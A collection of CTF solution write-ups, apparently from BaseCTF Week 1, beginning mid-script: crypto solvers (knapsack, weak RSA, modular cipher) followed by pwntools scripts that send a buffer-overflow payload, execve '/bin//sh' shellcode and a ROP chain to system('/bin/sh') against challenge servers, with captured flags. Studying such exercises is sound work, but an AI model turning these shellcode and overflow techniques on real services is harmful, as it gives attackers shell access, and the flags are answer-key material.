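# knapsack; whether `a` is already in the order that decode needs is not
# visible on this page.
# The pasted snippet had lost its indentation under the `for`; it is restored here.
flagmm = ''
for k in a:
    if k < c:
        c = c - k
        # print(c)
        flagmm += '1'
    else:
        flagmm += '0'
print(flagmm)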

[Week1] babyrsa

# The private exponent is taken as the inverse of e modulo n - 1.
# NOTE(review): n - 1 is the totient only when n itself is prime; presumably
# that is the weakness in this challenge.
phi = n - 1
d = mod_inverse(e, phi)

# Decrypt the message
m = pow(c, d, n)

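# Convert the integer m to a byte string
def long_to_bytes(m):
    """Return *m* as big-endian bytes, using the fewest bytes that hold it.

    m == 0 yields b'' because no bytes are needed; a negative m raises
    OverflowError from int.to_bytes.
    """
    # Round the bit length up to whole bytes.
    return m.to_bytes((m.bit_length() + 7) // 8, 'big')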

flag = long_to_bytes(m)

[Week1] 十七倍

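# Each value in `cipher` is treated as (17 * plain) mod 256. Adding back
# multiples of 256 until the value is divisible by 17 and the quotient fits in
# one byte recovers the plaintext character.
# The pasted snippet had lost its indentation under the outer `for`; it is restored here.
for one in cipher:
    for i in range(256):
        candidate = one + 256 * i
        # Must divide evenly by 17 and give a quotient below 256
        if candidate % 17 == 0 and candidate // 17 < 256:
            print(chr(candidate // 17), end="")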

[Week1] ez_rsa

sage解方程组算qp

# Sage: two equations in the two unknown primes. The first is n = p*q, the
# second is the extra value (p+2)*(q+2), which expands to p*q + 2*(p+q) + 4.
# Together they fix both p*q and p+q, so solve() can return p and q.
var('q p')
n=p*q==96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790344897976690691139671461342896437428086142262969360560293350630096355947291129943172939923835317907954465556018515239228081131167407674558849860647237317421
not_phi=(p+2)*(q+2)==96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790384900615665394180812810697286554008262030049280213663390855887077502992804805794388166197820395507600028816810471093163466639673142482751115353389655533205
solve([n, not_phi], p,q)

PWN

[Week1] 签个到吧

from pwn import *

# Sign-in challenge: connecting to the service is all that is needed.
HOST = "challenge.basectf.fun"
PORT = 41115

# The connection is opened as soon as the module is loaded, outside the guard below.
conn = remote(HOST, PORT)


if __name__ == '__main__':
    conn.interactive()
# BaseCTF{c2ccb761-9595-4d84-8d36-8d34fd07ee72}

[Week1] echo

/flag
# 我也不知道为什么这么搞,反正成功了
BaseCTF{fbaef266-94b9-47f9-8e68-da0250d5eadd}

[Week1] Ret2text

from pwn import *

HOST = "challenge.basectf.fun"
PORT = 36547
conn = remote(HOST, PORT)

# Payload layout: 0x20 filler bytes, one 8-byte placeholder, then two fixed
# addresses. NOTE(review): the addresses belong to this challenge binary and
# their meaning is not shown on the page. Hard-coded addresses and an
# unchecked overwrite suggest a build without PIE or a stack canary; confirm
# against the binary.
payload = b"".join([
    b"A" * 0x20,
    p64(0xdeedbeef),
    p64(0x000000000040101a),
    p64(0x4011A8),
])

# Wait for Enter before sending, e.g. to attach a debugger first.
input()
conn.sendline(payload)
conn.interactive()

BaseCTF{c417a22c-0d0f-4fc9-b6bb-e7d7da1eeaf4}

[Week1] shellcode_level0

from pwn import *

HOST = "challenge.basectf.fun"
PORT = 43556
conn = remote(HOST, PORT)

conn.recvuntil(b"please input shellcode: ")
# Wait for Enter before sending, e.g. to attach a debugger first.
input()
# 23 bytes of x86-64 machine code; the embedded string is "/bin//sh".
shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
conn.sendline(shellcode)
conn.interactive()

BaseCTF{1e317c52-cc9a-4009-bc7f-b999cc9624f3}

[Week1] 我把她丢了

    r.recvuntil('I lost her, what should I do? Help me find her.\n')
    # Addresses noted for this challenge binary:
    #   0x0000000000401196 : pop rdi ; ret
    #   0x0000000000402008 : bin_sh
    #   0x0000000000401080 : system
    # NOTE(review): 0x40101a is not explained on the page.
    chain = [
        p64(0xdeedbeef),
        p64(0x000000000040101a),
        p64(0x0000000000401196),
        p64(0x0000000000402008),
        p64(0x0000000000401080),
    ]
    # 0x70 filler bytes come first, followed by the 8-byte words above.
    p = b"A" * 0x70 + b"".join(chain)
    # p += elf.got['system']

    # Wait for Enter before sending, e.g. to attach a debugger first.
    input()
    r.sendline(p)
    r.interactive()

https://www.basectf.fun/games/1
